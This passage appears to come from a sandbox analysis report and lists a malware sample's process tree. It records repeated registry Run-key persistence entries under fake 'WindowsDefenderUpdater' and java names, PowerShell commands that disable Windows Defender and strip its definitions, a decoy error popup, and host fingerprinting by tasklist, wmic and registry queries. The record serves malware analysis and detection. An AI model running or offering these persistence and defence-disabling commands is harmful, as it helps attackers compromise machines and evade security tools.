        34⤵
        
        PID:1276
        
        C:\Windows\system32\reg.exe
        
        reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDefenderUpdater" /d "C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe" /f
        34⤵
        Adds Run key to start application
        
        PID:5912
        
        C:\Windows\system32\reg.exe
        
        reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "HOME" /d "C:\Windows\system32\javaw.exe" /f
        34⤵
        
        PID:3920
        
        C:\Windows\system32\reg.exe
        
        reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "javaUp" /d "C:\Windows\system32\java.exe" /f
        34⤵
        
        PID:1300
        
        C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe
        
        "C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe"
        34⤵
        
        PID:5672
        
        C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe
        
        "C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe"
        35⤵
        
        PID:820
        
        C:\Windows\system32\WinBioData\WindowsDataUpdater.exe
        
        "C:\Windows\system32\WinBioData\WindowsDataUpdater.exe"
        34⤵
        
        PID:4992
        
        C:\Windows\system32\java.exe
        
        "C:\Windows\system32\java.exe"
        34⤵
        Checks computer location settings
        
        PID:528
        
        C:\Windows\system32\cmd.exe
        
        "C:\Windows\system32\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\45CE.tmp\45CF.tmp\45D0.bat C:\Windows\system32\java.exe"
        35⤵
        Drops file in System32 directory
        
        PID:2384
        
        C:\Windows\system32\timeout.exe
        
        timeout 1
        36⤵
        Delays execution with timeout.exe
        
        PID:5684
        
        C:\Windows\system32\reg.exe
        
        reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDataUpdater" /d "C:\Windows\system32\WinBioData\WindowsDataUpdater.exe" /f
        36⤵
        
        PID:4304
        
        C:\Windows\system32\reg.exe
        
        reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDefenderUpdater" /d "C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe" /f
        36⤵
        Adds Run key to start application
        
        PID:5792
        
        C:\Windows\system32\reg.exe
        
        reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "HOME" /d "C:\Windows\system32\javaw.exe" /f
        36⤵
        
        PID:5616
        
        C:\Windows\system32\reg.exe
        
        reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "javaUp" /d "C:\Windows\system32\java.exe" /f
        36⤵
        Adds Run key to start application
        
        PID:4528
        
        C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe
        
        "C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe"
        36⤵
        
        PID:5028
        
        C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe
        
        "C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe"
        37⤵
        
        PID:3908
        
        C:\Windows\system32\WinBioData\WindowsDataUpdater.exe
        
        "C:\Windows\system32\WinBioData\WindowsDataUpdater.exe"
        36⤵
        
        PID:5180
        
        C:\Windows\system32\java.exe
        
        "C:\Windows\system32\java.exe"
        36⤵
        Checks computer location settings
        
        PID:2012
        
        C:\Windows\system32\cmd.exe
        
        "C:\Windows\system32\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\4DEC.tmp\4DED.tmp\4DEE.bat C:\Windows\system32\java.exe"
        37⤵
        Drops file in System32 directory
        
        PID:2816
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        38⤵
        
        PID:840
        
        C:\Windows\system32\timeout.exe
        
        timeout 1
        38⤵
        Delays execution with timeout.exe
        
        PID:5872
        
        C:\Windows\system32\reg.exe
        
        reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDataUpdater" /d "C:\Windows\system32\WinBioData\WindowsDataUpdater.exe" /f
        38⤵
        Adds Run key to start application
        
        PID:1136
        
        C:\Windows\system32\reg.exe
        
        reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDefenderUpdater" /d "C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe" /f
        38⤵
        
        PID:4972
        
        C:\Windows\system32\reg.exe
        
        reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "HOME" /d "C:\Windows\system32\javaw.exe" /f
        38⤵
        
        PID:6032
        
        C:\Windows\system32\reg.exe
        
        reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "javaUp" /d "C:\Windows\system32\java.exe" /f
        38⤵
        
        PID:3048
        
        C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe
        
        "C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe"
        38⤵
        
        PID:5564
        
        C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe
        
        "C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe"
        39⤵
        
        PID:844
        
        C:\Windows\system32\WinBioData\WindowsDataUpdater.exe
        
        "C:\Windows\system32\WinBioData\WindowsDataUpdater.exe"
        38⤵
        
        PID:2516
        
        C:\Windows\system32\java.exe
        
        "C:\Windows\system32\java.exe"
        38⤵
        Checks computer location settings
        
        PID:5944
        
        C:\Windows\system32\cmd.exe
        
        "C:\Windows\system32\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\55BC.tmp\55BD.tmp\55BE.bat C:\Windows\system32\java.exe"
        39⤵
        Drops file in System32 directory
        
        PID:5008
        
        C:\Windows\system32\timeout.exe
        
        timeout 1
        40⤵
        
        PID:2648
        
        C:\Windows\system32\reg.exe
        
        reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDataUpdater" /d "C:\Windows\system32\WinBioData\WindowsDataUpdater.exe" /f
        40⤵
        
        PID:1128
        
        C:\Windows\system32\reg.exe
        
        reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDefenderUpdater" /d "C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe" /f
        40⤵
        
        PID:3352
        
        C:\Windows\system32\reg.exe
        
        reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "HOME" /d "C:\Windows\system32\javaw.exe" /f
        40⤵
        
        PID:5472
        
        C:\Windows\system32\reg.exe
        
        reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "javaUp" /d "C:\Windows\system32\java.exe" /f
        40⤵
        
        PID:5592
        
        C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe
        
        "C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe"
        40⤵
        
        PID:4056
        
        C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe
        
        "C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe"
        41⤵
        
        PID:696
        
        C:\Windows\system32\WinBioData\WindowsDataUpdater.exe
        
        "C:\Windows\system32\WinBioData\WindowsDataUpdater.exe"
        40⤵
        
        PID:5064
        
        C:\Windows\system32\java.exe
        
        "C:\Windows\system32\java.exe"
        40⤵
        Checks computer location settings
        
        PID:5596
        
        C:\Windows\system32\cmd.exe
        
        "C:\Windows\system32\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\5D3E.tmp\5D3F.tmp\5D40.bat C:\Windows\system32\java.exe"
        41⤵
        Drops file in System32 directory
        
        PID:2124
        
        C:\Windows\system32\timeout.exe
        
        timeout 1
        42⤵
        
        PID:5812
        
        C:\Windows\system32\reg.exe
        
        reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDataUpdater" /d "C:\Windows\system32\WinBioData\WindowsDataUpdater.exe" /f
        42⤵
        
        PID:1192
        
        C:\Windows\system32\reg.exe
        
        reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDefenderUpdater" /d "C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe" /f
        42⤵
        
        PID:5964
        
        C:\Windows\system32\reg.exe
        
        reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "HOME" /d "C:\Windows\system32\javaw.exe" /f
        42⤵
        Adds Run key to start application
        
        PID:5620
        
        C:\Windows\system32\reg.exe
        
        reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "javaUp" /d "C:\Windows\system32\java.exe" /f
        42⤵
        Adds Run key to start application
        
        PID:1164
        
        C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe
        
        "C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe"
        42⤵
        
        PID:5704
        
        C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe
        
        "C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe"
        43⤵
        
        PID:5648
        
        C:\Windows\system32\WinBioData\WindowsDataUpdater.exe
        
        "C:\Windows\system32\WinBioData\WindowsDataUpdater.exe"
        42⤵
        
        PID:4616
        
        C:\Windows\system32\java.exe
        
        "C:\Windows\system32\java.exe"
        42⤵
        Checks computer location settings
        
        PID:5480
        
        C:\Windows\system32\cmd.exe
        
        "C:\Windows\system32\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\64D0.tmp\64D1.tmp\64D2.bat C:\Windows\system32\java.exe"
        43⤵
        Drops file in System32 directory
        
        PID:5476
        
        C:\Windows\system32\timeout.exe
        
        timeout 1
        44⤵
        Delays execution with timeout.exe
        
        PID:1136
        
        C:\Windows\system32\reg.exe
        
        reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDataUpdater" /d "C:\Windows\system32\WinBioData\WindowsDataUpdater.exe" /f
        44⤵
        
        PID:6032
        
        C:\Windows\system32\reg.exe
        
        reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDefenderUpdater" /d "C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe" /f
        44⤵
        
        PID:3048
        
        C:\Windows\system32\reg.exe
        
        reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "HOME" /d "C:\Windows\system32\javaw.exe" /f
        44⤵
        
        PID:2420
        
        C:\Windows\system32\reg.exe
        
        reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "javaUp" /d "C:\Windows\system32\java.exe" /f
        44⤵
        
        PID:5284
        
        C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe
        
        "C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe"
        44⤵
        
        PID:1656
        
        C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe
        
        "C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe"
        45⤵
        
        PID:380
        
        C:\Windows\system32\WinBioData\WindowsDataUpdater.exe
        
        "C:\Windows\system32\WinBioData\WindowsDataUpdater.exe"
        44⤵
        
        PID:1528
        
        C:\Windows\system32\java.exe
        
        "C:\Windows\system32\java.exe"
        44⤵
        Checks computer location settings
        
        PID:5996
        
        C:\Windows\system32\cmd.exe
        
        "C:\Windows\system32\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\6CFD.tmp\6CFE.tmp\6CFF.bat C:\Windows\system32\java.exe"
        45⤵
        Drops file in System32 directory
        
        PID:3744
        
        C:\Windows\system32\timeout.exe
        
        timeout 1
        46⤵
        Delays execution with timeout.exe
        
        PID:4184
        
        C:\Windows\system32\reg.exe
        
        reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDataUpdater" /d "C:\Windows\system32\WinBioData\WindowsDataUpdater.exe" /f
        46⤵
        
        PID:5600
        
        C:\Windows\system32\reg.exe
        
        reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDefenderUpdater" /d "C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe" /f
        46⤵
        
        PID:1676
        
        C:\Windows\system32\reg.exe
        
        reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "HOME" /d "C:\Windows\system32\javaw.exe" /f
        46⤵
        
        PID:4724
        
        C:\Windows\system32\reg.exe
        
        reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "javaUp" /d "C:\Windows\system32\java.exe" /f
        46⤵
        Adds Run key to start application
        
        PID:5784
        
        C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe
        
        "C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe"
        46⤵
        
        PID:6096
        
        C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe
        
        "C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe"
        47⤵
        
        PID:3184
        
        C:\Windows\system32\WinBioData\WindowsDataUpdater.exe
        
        "C:\Windows\system32\WinBioData\WindowsDataUpdater.exe"
        46⤵
        
        PID:4860
        
        C:\Windows\system32\java.exe
        
        "C:\Windows\system32\java.exe"
        46⤵
        Checks computer location settings
        
        PID:732
        
        C:\Windows\system32\cmd.exe
        
        "C:\Windows\system32\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\7450.tmp\7451.tmp\7452.bat C:\Windows\system32\java.exe"
        47⤵
        Drops file in System32 directory
        
        PID:5800
        
        C:\Windows\system32\timeout.exe
        
        timeout 1
        48⤵
        
        PID:2828
        
        C:\Windows\system32\reg.exe
        
        reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDataUpdater" /d "C:\Windows\system32\WinBioData\WindowsDataUpdater.exe" /f
        48⤵
        
        PID:5260
        
        C:\Windows\system32\reg.exe
        
        reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDefenderUpdater" /d "C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe" /f
        48⤵
        
        PID:3096
        
        C:\Windows\system32\reg.exe
        
        reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "HOME" /d "C:\Windows\system32\javaw.exe" /f
        48⤵
        Adds Run key to start application
        
        PID:3244
        
        C:\Windows\system32\reg.exe
        
        reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "javaUp" /d "C:\Windows\system32\java.exe" /f
        48⤵
        
        PID:5424
        
        C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe
        
        "C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe"
        48⤵
        
        PID:4492
        
        C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe
        
        "C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe"
        49⤵
        
        PID:3204
        
        C:\Windows\system32\WinBioData\WindowsDataUpdater.exe
        
        "C:\Windows\system32\WinBioData\WindowsDataUpdater.exe"
        48⤵
        
        PID:3408
        
        C:\Windows\system32\java.exe
        
        "C:\Windows\system32\java.exe"
        48⤵
        Checks computer location settings
        
        PID:1620
        
        C:\Windows\system32\cmd.exe
        
        "C:\Windows\system32\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\7C01.tmp\7C02.tmp\7C13.bat C:\Windows\system32\java.exe"
        49⤵
        Drops file in System32 directory
        
        PID:5176
        
        C:\Windows\system32\timeout.exe
        
        timeout 1
        50⤵
        Delays execution with timeout.exe
        
        PID:5268
        
        C:\Windows\system32\reg.exe
        
        reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDataUpdater" /d "C:\Windows\system32\WinBioData\WindowsDataUpdater.exe" /f
        50⤵
        
        PID:5320
        
        C:\Windows\system32\reg.exe
        
        reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDefenderUpdater" /d "C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe" /f
        50⤵
        Adds Run key to start application
        
        PID:6100
        
        C:\Windows\system32\reg.exe
        
        reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "HOME" /d "C:\Windows\system32\javaw.exe" /f
        50⤵
        
        PID:5024
        
        C:\Windows\system32\reg.exe
        
        reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "javaUp" /d "C:\Windows\system32\java.exe" /f
        50⤵
        
        PID:5752
        
        C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe
        
        "C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe"
        50⤵
        
        PID:368
        
        C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe
        
        "C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe"
        51⤵
        
        PID:5264
        
        C:\Windows\system32\WinBioData\WindowsDataUpdater.exe
        
        "C:\Windows\system32\WinBioData\WindowsDataUpdater.exe"
        50⤵
        
        PID:1092
        
        C:\Windows\system32\java.exe
        
        "C:\Windows\system32\java.exe"
        50⤵
        Checks computer location settings
        
        PID:5404
        
        C:\Windows\system32\cmd.exe
        
        "C:\Windows\system32\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\843E.tmp\843F.tmp\8440.bat C:\Windows\system32\java.exe"
        51⤵
        Drops file in System32 directory
        
        PID:4124
        
        C:\Windows\system32\timeout.exe
        
        timeout 1
        52⤵
        
        PID:5292
        
        C:\Windows\system32\reg.exe
        
        reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDataUpdater" /d "C:\Windows\system32\WinBioData\WindowsDataUpdater.exe" /f
        52⤵
        
        PID:4260
        
        C:\Windows\system32\reg.exe
        
        reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDefenderUpdater" /d "C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe" /f
        52⤵
        Adds Run key to start application
        
        PID:5684
        
        C:\Windows\system32\reg.exe
        
        reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "HOME" /d "C:\Windows\system32\javaw.exe" /f
        52⤵
        Adds Run key to start application
        
        PID:1312
        
        C:\Windows\system32\reg.exe
        
        reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "javaUp" /d "C:\Windows\system32\java.exe" /f
        52⤵
        
        PID:5724
        
        C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe
        
        "C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe"
        52⤵
        
        PID:3108
        
        C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe
        
        "C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe"
        53⤵
        
        PID:3000
        
        C:\Windows\system32\WinBioData\WindowsDataUpdater.exe
        
        "C:\Windows\system32\WinBioData\WindowsDataUpdater.exe"
        52⤵
        
        PID:5792
        
        C:\Windows\system32\java.exe
        
        "C:\Windows\system32\java.exe"
        52⤵
        Checks computer location settings
        
        PID:5868
        
        C:\Windows\system32\cmd.exe
        
        "C:\Windows\system32\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\8BFF.tmp\8C00.tmp\8C01.bat C:\Windows\system32\java.exe"
        53⤵
        Drops file in System32 directory
        
        PID:5188
        
        C:\Windows\system32\timeout.exe
        
        timeout 1
        54⤵
        
        PID:2324
        
        C:\Windows\system32\reg.exe
        
        reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDataUpdater" /d "C:\Windows\system32\WinBioData\WindowsDataUpdater.exe" /f
        54⤵
        
        PID:5228
        
        C:\Windows\system32\reg.exe
        
        reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDefenderUpdater" /d "C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe" /f
        54⤵
        
        PID:5912
        
        C:\Windows\system32\reg.exe
        
        reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "HOME" /d "C:\Windows\system32\javaw.exe" /f
        54⤵
        Adds Run key to start application
        
        PID:2360
        
        C:\Windows\system32\reg.exe
        
        reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "javaUp" /d "C:\Windows\system32\java.exe" /f
        54⤵
        
        PID:6104
        
        C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe
        
        "C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe"
        54⤵
        
        PID:5528
        
        C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe
        
        "C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe"
        55⤵
        
        PID:5920
        
        C:\Windows\system32\WinBioData\WindowsDataUpdater.exe
        
        "C:\Windows\system32\WinBioData\WindowsDataUpdater.exe"
        54⤵
        
        PID:2760
        
        C:\Windows\system32\java.exe
        
        "C:\Windows\system32\java.exe"
        54⤵
        Checks computer location settings
        
        PID:5720
        
        C:\Windows\system32\cmd.exe
        
        "C:\Windows\system32\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\947B.tmp\947C.tmp\947D.bat C:\Windows\system32\java.exe"
        55⤵
        Drops file in System32 directory
        
        PID:5284
        
        C:\Windows\system32\timeout.exe
        
        timeout 1
        56⤵
        Delays execution with timeout.exe
        
        PID:1128
        
        C:\Windows\system32\reg.exe
        
        reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDataUpdater" /d "C:\Windows\system32\WinBioData\WindowsDataUpdater.exe" /f
        56⤵
        
        PID:5128
        
        C:\Windows\system32\reg.exe
        
        reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDefenderUpdater" /d "C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe" /f
        56⤵
        
        PID:3028
        
        C:\Windows\system32\reg.exe
        
        reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "HOME" /d "C:\Windows\system32\javaw.exe" /f
        56⤵
        
        PID:6136
        
        C:\Windows\system32\reg.exe
        
        reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "javaUp" /d "C:\Windows\system32\java.exe" /f
        56⤵
        
        PID:3352
        
        C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe
        
        "C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe"
        56⤵
        
        PID:2740
        
        C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe
        
        "C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe"
        57⤵
        
        PID:5696
        
        C:\Windows\system32\WinBioData\WindowsDataUpdater.exe
        
        "C:\Windows\system32\WinBioData\WindowsDataUpdater.exe"
        56⤵
        
        PID:5908
        
        C:\Windows\system32\java.exe
        
        "C:\Windows\system32\java.exe"
        56⤵
        Checks computer location settings
        
        PID:2792
        
        C:\Windows\system32\cmd.exe
        
        "C:\Windows\system32\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\9C5A.tmp\9C5B.tmp\9C5C.bat C:\Windows\system32\java.exe"
        57⤵
        Drops file in System32 directory
        
        PID:3416
        
        C:\Windows\system32\timeout.exe
        
        timeout 1
        58⤵
        
        PID:1312
        
        C:\Windows\system32\reg.exe
        
        reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDataUpdater" /d "C:\Windows\system32\WinBioData\WindowsDataUpdater.exe" /f
        58⤵
        Adds Run key to start application
        
        PID:5724
        
        C:\Windows\system32\reg.exe
        
        reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDefenderUpdater" /d "C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe" /f
        58⤵
        Adds Run key to start application
        
        PID:5804
        
        C:\Windows\system32\reg.exe
        
        reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "HOME" /d "C:\Windows\system32\javaw.exe" /f
        58⤵
        
        PID:5492
        
        C:\Windows\system32\reg.exe
        
        reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "javaUp" /d "C:\Windows\system32\java.exe" /f
        58⤵
        
        PID:4356
        
        C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe
        
        "C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe"
        58⤵
        
        PID:4860
        
        C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe
        
        "C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe"
        59⤵
        
        PID:3244
        
        C:\Windows\system32\WinBioData\WindowsDataUpdater.exe
        
        "C:\Windows\system32\WinBioData\WindowsDataUpdater.exe"
        58⤵
        
        PID:4756
        
        C:\Windows\system32\java.exe
        
        "C:\Windows\system32\java.exe"
        58⤵
        Checks computer location settings
        
        PID:6064
        
        C:\Windows\system32\cmd.exe
        
        "C:\Windows\system32\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\A39E.tmp\A39F.tmp\A3A0.bat C:\Windows\system32\java.exe"
        59⤵
        Drops file in System32 directory
        
        PID:4564
        
        C:\Windows\system32\timeout.exe
        
        timeout 1
        60⤵
        
        PID:3592
        
        C:\Windows\system32\reg.exe
        
        reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDataUpdater" /d "C:\Windows\system32\WinBioData\WindowsDataUpdater.exe" /f
        60⤵
        
        PID:3564
        
        C:\Windows\system32\reg.exe
        
        reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDefenderUpdater" /d "C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe" /f
        60⤵
        
        PID:5972
        
        C:\Windows\system32\reg.exe
        
        reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "HOME" /d "C:\Windows\system32\javaw.exe" /f
        60⤵
        
        PID:4952
        
        C:\Windows\system32\reg.exe
        
        reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "javaUp" /d "C:\Windows\system32\java.exe" /f
        60⤵
        
        PID:4708
        
        C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe
        
        "C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe"
        60⤵
        
        PID:456
        
        C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe
        
        "C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe"
        61⤵
        Drops file in Drivers directory
        
        PID:4848
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe'"
        62⤵
        
        PID:6120
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command Add-MpPreference -ExclusionPath 'C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe'
        63⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        
        PID:3536
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
        62⤵
        
        PID:5080
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
        63⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        
        PID:4288
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "mshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('Could not open the file', 0, 'Error', 32+16);close()""
        62⤵
        
        PID:5648
        
        C:\Windows\system32\mshta.exe
        
        mshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('Could not open the file', 0, 'Error', 32+16);close()"
        63⤵
        
        PID:3508
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
        62⤵
        
        PID:840
        
        C:\Windows\system32\tasklist.exe
        
        tasklist /FO LIST
        63⤵
        Enumerates processes with tasklist
        
        PID:5388
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
        62⤵
        
        PID:6084
        
        C:\Windows\System32\Wbem\WMIC.exe
        
        wmic csproduct get uuid
        63⤵
        
        PID:5312
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 2"
        62⤵
        
        PID:1644
        
        C:\Windows\system32\reg.exe
        
        REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 2
        63⤵
        
        PID:5492
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName 2"
        62⤵
        
        PID:1192
        
        C:\Windows\system32\reg.exe
        
        REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName 2
        63⤵
        
        PID:392
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
        62⤵
        
        PID:5384
        
        C:\Windows\System32\Wbem\WMIC.exe
        
        wmic path win32_VideoController get name
        63⤵
        Detects videocard installed
        
        PID:4368
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
        62⤵
        
        PID:5220
        
        C:\Windows\System32\Wbem\WMIC.exe
        
